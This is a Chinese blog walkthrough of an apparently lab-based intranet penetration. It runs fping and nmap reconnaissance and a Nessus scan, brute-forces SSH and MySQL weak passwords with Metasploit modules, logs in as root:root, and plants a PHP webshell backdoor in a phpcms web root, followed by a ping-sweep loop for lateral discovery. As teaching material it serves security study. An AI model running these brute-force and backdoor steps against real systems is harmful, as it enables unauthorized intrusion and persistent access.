内网渗透之信息收集

内网渗透之信息收集

注:这里也可以利用dig进行域名信息收集等(如有雷同,纯属虚构)

这一次我们将对内网进行一下信息收集,收集的内容主要包括:

主机系统服务版本、IP地址、端口、服务及服务版本、可能存在的漏洞等

模拟场景:

有一天,k悄悄的连接到了c的交换机上(至于怎么实施的我也不知道),因为xxx事件,对c的内部比较xxx,所以这天k趁着夜色连上内网后开始了他渗透之旅。

k =》 kali,c 》 CentOS, w =》 Win

1、信息收集-存活主机

首先k将自己的网卡调成自动获取IP之后,等待一会开始查看被分配的IP地址

Python
root@mtcx:~# ifconfig

image.png

可以看到当前的IP为192.168.12.53、掩码为255.255.255.0,所以k知道了当前网段为192.168.12.0/24的(应该是这样的讲的吧)

所以k想到了使用fping这个命令去探测当前网段下是否还有其他主机存在.(为什么不用ping,我不会写编程呀,又懒得的搜)

1-1、内网探测之fping工具

Python
root@mtcx:~# fping -ag 192.168.12.0/24 >> demo.txt
#意思将扫描到的存活主机地址写入到当前目录下demo.txt文件里

image.png

等待扫描结束后,k查看了收集到的存活主机

Python
root@mtcx:~# cat demo.txt

image.png

从得到的结果中可以知道,除了自身的.53的IP外还有一个.58的主机存活,emmm 那个.2的是网关

所以接下就以.58为突破口进入到内部(为什么还要进内部呢,哇,不可能一下就进到核心区的吧,那样敌方也太弱了吧)

1-2、小结

收集到一台存活的主机.58其他信息未知下步进行验证

2、信息收集-端口收集

k获取一台存活的主机IP.58后,开始向其端口出手了。

2-1、端口扫描-nmap神器

Python
root@mtcx:~# nmap 192.168.12.58
#使用默认配置扫描主机,可能存在遗漏

image.png

通过简单的扫描后发现目标有4个端口是开放的,分别是

Python
22端口的ssh服务、80端口的http服务、111端口的rpcbind服务以及3306端口的mysql服务

但是仅知道这些端口是不够的还不知道目标的系统版本什么、指纹信息等也是不知道的,所以又开始了新一轮扫描

Python
root@mtcx:~# nmap -sV -p1-65535 -O 192.168.12.58
#这里的参数问题,-sV 版本 -p1-65535 端口 -O 指纹

image.png

通过扫描后发现目标更详细的信息

Python
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
111/tcp  open  rpcbind 2-4 (RPC #100000)
3306/tcp open  mysql   MariaDB (unauthorized)

MAC Address: 00:0C:29:5A:A7:89 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

好了,根据获取到的信息k已经知道了目标的系统为CentOS,可以进行ssh登陆,可以通过web访问、可以查询数据库,下面就是根据这些点查询相应的漏洞了。

注:或许你可能很疑惑为什么不进行其他的探测了,以为时间不允许呀。后面的事情还有很多,如果都弄完了,可能自己就没了(真正的从天黑到天亮再到~~),所以端口扫描就到这里先,想了解更多的可以查询下NMAP相关手册。

3、漏洞扫描-Nessus漏扫

在拿到这些信息以后为节省时间,k准备使用Nessus漏扫工具查看下其是否存在相应漏洞。(Nessus的安装问题请问下度娘

打开早已准备好的Nessus界面。

image.png

注:如果出现打不开可能是服务停止了,手动开启下

image.png

添加一个新的扫描,选择高级扫描

image.png

添加详细信息

image.png

开始扫描

image.png点击查看详情

image.png

在等待一会后扫描结束

image.png

点击查看

image.png

然后百度一波,emm,算了 还是再去找找吧

之后k来到了.58的80主页发现这是一个默认页,emm 找不到其他的信息呀。难道要御剑飞行!!算了再去看看别的。image.png

4、启动MSF框架

即然是内网渗透怎么少的了MSF呢,去吧~

Python
root@mtcx:~# msfdb run

image.png

由之前的信息收集可知,目标开启了22、80、111、3306端口,所以现在尝试弱口令登陆22端口试试。

4-1、ssh弱口令登陆

Python
msf5 > search ssh_login  
#搜索ssh登陆模块[object Object]
发现有两个模块可以用于登陆的,这里选择第一个。
msf5 > use auxiliary/scanner/ssh/ssh_login

image.png

查看下详细配置

Python
msf5 auxiliary(scanner/ssh/ssh_login) > show options

image.png

这里对上面这三处位置进行设置

Python
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.12.58
RHOSTS => 192.168.12.58
#设置目标IP
msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /user/share/metasploitframework/data/wordlists/root_userpass.txt 
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
#设置字典

image.png

开始登陆

Python
msf5 auxiliary(scanner/ssh/ssh_login) > run
#登陆

image.png发现可以用root:root进行登陆,看样子好像权限还是比较高的那种,ssh登陆一下

5、进入到CentOS系统

新建一个窗口,使用ssh进行登陆(一般不要这样登陆哦)

Python
root@mtcx:~# ssh root@192.168.12.58
#ssh登陆

image.png

查看当前所在IP是否为目标IP

Python
[root@localhost ~]# ifconfig

惊喜的发现这里还存在一个网段192.168.159.0/24的,当前主机的IP为.130(拿小本本先记一下)

6、新一轮的信息收集

开始查看当前目标中存在的用户

Python
[root@localhost ~]# cd /home/
[root@localhost home]# ls

image.png

发现还存在一个mtcx的用户。(搞事情,搞事情)

以为当前用户为最高权限,所以可去很多地方的,所以接下来查看下mtcx中的信息image.png

查看里面有没有数据

image.png

emmm,刚建的服务好像没啥东西  ̄へ ̄

对了,想起来之前在扫描时还存在一个开放的80端口,应该会有网站的存在,去看一眼。

7、发现网站

Python
[root@localhost 下载]# cd /var/www/
cgi-bin/ html/    
[root@localhost 下载]# cd /var/www/html/
authkey/ day/     readme/  
[root@localhost 下载]# cd /var/www/html/authkey/
api/           caches/        html/          install/       phpcms/        phpsso_server/ statics/       uploadfile/

image.png

审计源码什么太累了,还是直接写一个一句话好了,方便下次进入

Python
[root@localhost authkey]# vim cms.php

image.png

查看下文件所在image.png

之后就是浏览器验证了,发现很OK

image.png

现在后门以后,找一下还有没有其他的点,好像还有一个mysql服务也是开的,试试去

回到msf上,搜索下MySQL的登陆模块(这里为什么又到这里呢,主要是介绍msf的用法,毕竟那边已经拿到最高权限了直接去都是可以的实现的)

Python
msf5 auxiliary(scanner/ssh/ssh_login) > search mysql_login

image.png

使用模块

image.png

和之前ssh的配置基本一致

image.png

开始登陆

Ruby
msf5 auxiliary(scanner/mysql/mysql_login) > run

image.png

和想象中不太一样欸,还是尝试下又没用弱口令

经过尝试,emmm 就去了image.png

查看下数据库image.png

。。。接下的事情就不说了,你懂的。

8、横向提权

探索其他主机

使用ping命令探索(超慢的)

Python
for i in {1..254};do ping 192.168.159.$i -c1|grep time=|awk -F "[(): ]" '{print $4}';done

image.png

之后发现有一台存活的.132的主机

。。。

现在k面临一个问题如何去攻击.132的主机,因为不在一个网段无法利用自身已有的工具,有效的攻击。这该怎么办呢?

posted @ 2020-06-08 15:03  MTcx  阅读(715)  评论(0编辑  收藏  举报